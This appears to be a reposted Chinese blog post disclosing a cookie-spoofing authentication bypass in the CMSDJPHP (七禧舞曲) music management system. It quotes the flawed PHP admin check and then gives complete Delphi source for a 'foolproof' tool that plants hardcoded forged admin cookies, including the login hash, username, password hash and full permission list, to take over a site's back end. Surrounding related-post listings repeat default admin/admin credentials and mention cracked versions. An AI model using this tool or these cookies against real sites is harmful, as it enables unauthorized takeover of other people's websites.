七禧舞曲 php,CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day

最新推荐文章于 2021-04-02 03:03:46 发布
最新推荐文章于 2021-04-02 03:03:46 发布
阅读量113 收藏
点赞数
文章标签: 七禧舞曲 php

66b39cefea89699334f2cf28c29bb452.gif

CMSDJPHP 七禧舞曲管理系统cookies欺骗

2012-12-23 21:36:0919 charlie 408

应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,

$CD_Version='V1.0';

$CD_Build='20100501';

function admincheck($CD_Permission){

if($_COOKIE['CD_Permission']<>''){

$menuarr=explode(',',$_COOKIE['CD_Permission']);

$adminlogined='False';

for($i=0;$i

if($menuarr[$i]==$CD_Permission){$adminlogined='True';}

}

if($adminlogined=='False'){AdminAlert('出错了,您没有进入本页面的权限!','',2);}

}else{

AdminAlert('出错了,您没有进入本页面的权限!','',2);

}

}

if(empty($_COOKIE['CD_AdminID'])){

AdminAlert('您没有进入本页面的权限,本次操作已被记录!','admin_login.php',0);

}elseif($_COOKIE['CD_Login']!=md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])){//亮点在这句

AdminAlert('您没有进入本页面的权限,本次操作已被记录!','admin_login.php',0);

}

刚刚看的官网最新补丁,注释了两条无关的代码而已:

$CD_Version="V1.1";

$CD_Build="20121208";

//if(!eregi($_SERVER['SERVER_NAME'],$_SERVER['HTTP_REFERER'])){

//        echo "

对不起,为了系统安全,不允许直接输入地址访问本系统的后台管理页面。

";

//        exit();

//}

function admincheck($CD_Permission){

if($_COOKIE['CD_Permission']<>""){

$menuarr=explode(",",$_COOKIE['CD_Permission']);

$adminlogined="False";

for($i=0;$i

if($menuarr[$i]==$CD_Permission){$adminlogined="True";}

}

//if($adminlogined=="False"){AdminAlert("出错了,您没有进入本页面的权限!","",2);}

}else{

//AdminAlert("出错了,您没有进入本页面的权限!","",2);

}

}

if(empty($_COOKIE['CD_AdminID'])){

AdminAlert("您没有进入本页面的权限,本次操作已被记录!","admin_login.php",0);

}elseif($_COOKIE['CD_Login']!=md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])){

AdminAlert("您没有进入本页面的权限,本次操作已被记录!","admin_login.php",0);

}

66b39cefea89699334f2cf28c29bb452.gif

利用,自己构造一个能让它计算正确的cookies,实在不知道安装一个系统。然后登陆一次。提取自己的cookies。使用delphi 画个webbrowser控件,设置下cookies,傻瓜化工具就诞生了。

unit uMain;

{

T00ls首发

}

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, bsSkinData, BusinessSkinForm, bsSkinCtrls, OleCtrls, SHDocVw,

StdCtrls, Mask, bsSkinBoxCtrls,MSHTML;

type

TfrmMyFish = class(TForm)

bsBusinessSkinForm1: TbsBusinessSkinForm;

bsCompressedStoredSkin1: TbsCompressedStoredSkin;

bsSkinData1: TbsSkinData;

pnlContorl: TbsSkinPanel;

pnlBrowser: TbsSkinPanel;

wbAdmin: TWebBrowser;

lblURL: TbsSkinStdLabel;

edtURL: TbsSkinEdit;

btnGo: TbsSkinSpeedButton;

lblFishAdmin: TbsSkinStdLabel;

edtFishAdmin: TbsSkinEdit;

pnlLoading: TbsSkinPanel;

GaugeLoading: TbsSkinGauge;

lblLoading: TbsSkinStdLabel;

procedure btnGoClick(Sender: TObject);

procedure FormResize(Sender: TObject);

procedure FormCreate(Sender: TObject);

procedure wbAdminProgressChange(Sender: TObject; Progress,

ProgressMax: Integer);

private

{ Private declarations }

public

{ Public declarations }

end;

const

COOKIE_HEAD = 'CD_Login=1df476c11ce215ad5a402afe5f370148; ';

COOKIE_PASS = 'CD_AdminID=1; CD_AdminUserName=admin; CD_AdminPassWord=7622f895d131b0155232085e7b4a7654; CD_Permission=1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11; ';

var

frmMyFish: TfrmMyFish;

Doc: IHTMLDocument2;

IsTrue: Boolean;

iP: Integer;

implementation

{$R *.dfm}

function EncDecCode(Text:String; XorPass: Integer): String;

var

i, Len: integer;

begin

Result:='';

Len := StrLen(Pchar(Text));

for i := 1 to Len do

begin

Result := Result + Chr(Ord(Text[i]) xor XorPass);

end;

end;

function XCode(Str:String):String;

begin

Result:='';

Result:=PChar(EncDecCode(Str,12));

end;

procedure TfrmMyFish.btnGoClick(Sender: TObject);

var

sCookies: string;

sList: TStrings;

i: Integer;

begin

sCookies := COOKIE_HEAD + COOKIE_PASS;

lblLoading.Caption := '正在努力···';

pnlBrowser.Visible := False;

pnlLoading.Visible := True;

wbAdmin.Navigate(edtURL.Text);

repeat

Application.ProcessMessages;

Sleep(50);

until not wbAdmin.Busy;

Doc := wbadmin.Document as IHTMLDocument2;

sList := TStringList.Create;

try

sList.CommaText := sCookies;

for i:=0 to sList.Count-1 do

begin

Doc.cookie := sList.Strings[i];

end;

pnlBrowser.Visible := True;

pnlLoading.Visible := False;

wbAdmin.Refresh;

finally

sList.Free;

end;

end;

procedure TfrmMyFish.FormResize(Sender: TObject);

begin

edtURL.Width := pnlContorl.Width - 150 - 100;

btnGo.Left := pnlContorl.Width - 75;

GaugeLoading.Width := pnlLoading.Width div 100 * 70;

GaugeLoading.Left := (pnlLoading.Width - GaugeLoading.Width) div 2;

GaugeLoading.Top  := pnlLoading.Height div 2 - 100;

lblLoading.Width := pnlLoading.Width div 100 * 70;

lblLoading.Left :=  (pnlLoading.Width - GaugeLoading.Width) div 2;

lblLoading.Top :=  pnlLoading.Height div 2 + 50;

end;

procedure TfrmMyFish.FormCreate(Sender: TObject);

begin

pnlBrowser.Visible := False;

pnlBrowser.Align := alClient;

wbAdmin.Align    := alClient;

pnlLoading.Visible := True;

pnlLoading.Align := alClient;

GaugeLoading.Value := 0;

lblLoading.Caption := '初始化完毕。';

end;

procedure TfrmMyFish.wbAdminProgressChange(Sender: TObject; Progress,

ProgressMax: Integer);

begin

if ProgressMax<>0 then

begin

iP:=Progress*100 div ProgressMax;

GaugeLoading.Value := iP;

end else;

end;

end.

海纳大容
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
七禧舞曲管理系统PHP版1.1完美无错版
05-20
七禧舞曲管理系统PHP版1.1完美无错版
七禧舞曲CMS管理系统VIP.rar
07-05
Admin\Inc\Mold_Inc.Asp User\Inc\Inc.asp 两个重要文件 后台地址:admin/login.asp 后台帐号:admin 后台密码:admin
七禧舞曲管理系统 V3.0 免费版.rar
07-05
安装说明:         注意:本地调试,请使用系统自带的IIS调试..使用其他小型IIS软件,可能会导致功能不能正常使用!!!     Data/Cache 文件夹需要写入权限     Include/CmsDj.Config.asp 文件需要写入权限     Upload 文件夹需要写入权限     后台地址:http://你的域名/Admin/Index.asp     后台帐号:admin 密码:admin 认证码:admin 以上程序由红人战歌网整理发布!开源程序,请放心使用。
七禧舞曲管理系统 v3.0
12-07
安装说明: 注意:本地调试,请使用系统自带的IIS调试..使用其他小型IIS软件,可能会导致功能不能正常使用!!! ********************************************* * Data/Cache 文件夹需要写入权限 * * * * Include/CmsDj.Config.asp 文件需要写入权限 * ********************************************* 后台地址:http://你的域名/Admin/Index.asp 后台帐号:admin 密码:admin 认证码:admin
七禧舞曲管理系统 v3.0 商业版.rar
07-05
详细介绍 七禧舞曲管理系统修改完美版 1:加入会员正在试听功能 2:主页可加51代码 3:修正后台不能恢复数据库的错误 4:采集系统项目管理,可一步采集 5:支持flv等视频格式加入盗连优酷网播放器 ------------------------------------------------- 修复BUG列表: ●修复了标签兼容问题,不会再出现一个页面限一次 ●修复了用SQL数据库搜索页面会出错的bug ●修复了后台搜索的bug ●修复了后台单一对歌曲修改后自动跳转到第1页bug ●修复了不能删除主页留言的bug ●修复了浏览记录和网友正在试听歌名重复的bug ●修复了I P 屏蔽的bug ●修复了网站维护开关的bug ●修复了会员有时不能注册的bug ●修复了后台一些安全问题,禁止外部提交 后台地址:/admin/ ID:admin 密码:admin
七禧DJ舞曲管理系统1.0正式版
08-04
七禧DJ舞曲管理系统1.0正式版
七禧php后台,CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day
weixin_34618077的博客
04-02 199
本人首发于T00ls,转一份来自己博客。转载请注明出处。微博:http://weibo.com/yinyongyou 应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,漏洞依然存在。这是一个神级漏洞,体现了程序员的神逻辑。看代码admin/admin_check.php$CD_Version='V1.0';$CD_Build='20100501';function admincheck($...
CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day
MichaelJScofield的专栏
12-23 3023
本人首发于T00ls,转一份来自己博客。转载请注明出处。 微博:http://weibo.com/yinyongyou 应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,漏洞依然存在。 这是一个神级漏洞,体现了程序员的神逻辑。 看代码 admin/admin_check.php <?php $CD_Version='V1.0'; $CD_Build='201
七禧舞曲管理系统 ASP版上传漏洞
MichaelJScofield的专栏
09-24 1847
Author:Charlie 微博:http://weibo.com/yinyongyou 转载请带我环游网络。 --------------------------------------------------------------------------------------------------------- 漏洞存在版本号:asp 3.0 (当天在官网下载的最新版本) 漏
七禧 PHPV1.2 0ddj
08-25
很好的开发音乐系统,自己DY一下,asp类型。
七禧舞曲管理系统 PHP1.0 破解版
06-10
七喜的PHP-VIP版 ---------------------- 首先在这里告诉大家,这个版本还存在一个功能缺陷,就是后台添加不到音乐,所有的音乐要到会员中心那里上传。 我知道很多人问我为什么会这样。告诉大家,这套程序本身就是这样的。(在此我也希望有能力的朋友帮助完成后台添加的功能。) ------------------------------------------------------------------------------------------ 其他的功能我都测试了完整,PHP文件曾经给很多为了赚钱的“黑人”用微盾PHP加密工具加密过,有的还用函数混乱加密方式加密了。 但是一套程序存在金钱利益就会失去了它本身的意义。同时我也希望 “萝卜老乡” 谅解。 ----------------------------------------------------------------------------------------- 解密这套完整的PHP程序不容易的。由于文件很多。 ----------------------------------------------------------------------------------------- 1。访问安装http://你站的域名/install/index.php 2。填写你的MYSQL数据库的资料 3。完成安装 ----------------------------------------------------------------------------------------- 在此提醒大家,这套东西要求的服务器系统要WINDOWS 也就是支持ASP的服务器或者空间 PHP组件 ----------------------------------------------------------------------------------------- MySQL支持及版本: [√] /版本:5.0.51a PHP运行方式: isapi GD library: [√] /版本:bundled (2.0.34 compatible) PHP版本: 5.2.9-2 allow_url_fope: [√] (不符合要求将导致采集、远程资料本地化等功能无法应用) safe_mode: [√]Off (本系统不支持在非win主机的安全模式下运行) curl_init: [√] (不符合要求将导致采集、远程资料本地化等功能无法应用) ----------------------------------------------------------------------------------------- 模板那些东西我会增加上去的。 有问题可以去www.qikez.com 或者 blog.qikez.com 我的QQ空间留言 感谢你们了。 程序破解:FLY QQ47346888 群:86546258
七禧舞曲CMS V1.2.7z
03-12
水晶dj七禧舞曲CMS v1.2 1:修正后台不能登陆的错误 2:修正前台不显示登陆框的错误~ 3:修正播放页面一些错误~ 4:添加Install.asp安装文件 大致调试了下ac版 感觉还不错 程序自带了三套模板。需要的朋友可以不妨看看
七禧二次开发DiscuzX2.5舞曲系统+精仿9ku音乐网模板.rar
08-20
七禧二次开发DiscuzX2.5舞曲系统+精仿9ku音乐网模板.rar 网上卖100大洋的,DZ程序。
七禧舞曲管理系统PHP v1.0.rar
07-07
首先在这里告诉大家,这个版本还存在一个功能缺陷,就是后台添加不到音乐,所有的音乐要到会员中心那里上传。...在此提醒大家,这套东西要求的服务器系统要WINDOWS 也就是支持ASP的服务器或者空间 PHP组件
七禧舞曲管理系统PHP版1.1完美版
05-15
七禧舞曲管理系统PHP版1.1完美版http://item.taobao.com/item.htm?id=10351765789
七禧舞曲CMS V1.2 Build 081013网站源码
01-05
七禧舞曲CMS V1.2 Build 081013网站源码
discuzx2.5音乐播放器自动播放并且循环播放,最简单的修改方法
eldn__的专栏
04-04 1001
打开/source/function/function_discuzcode.php文件,找到362行的如下代码: return '$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'FlashVars\', \'soundFile='.urlencode($url).'\', \'width\', \'290\', \'heigh

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值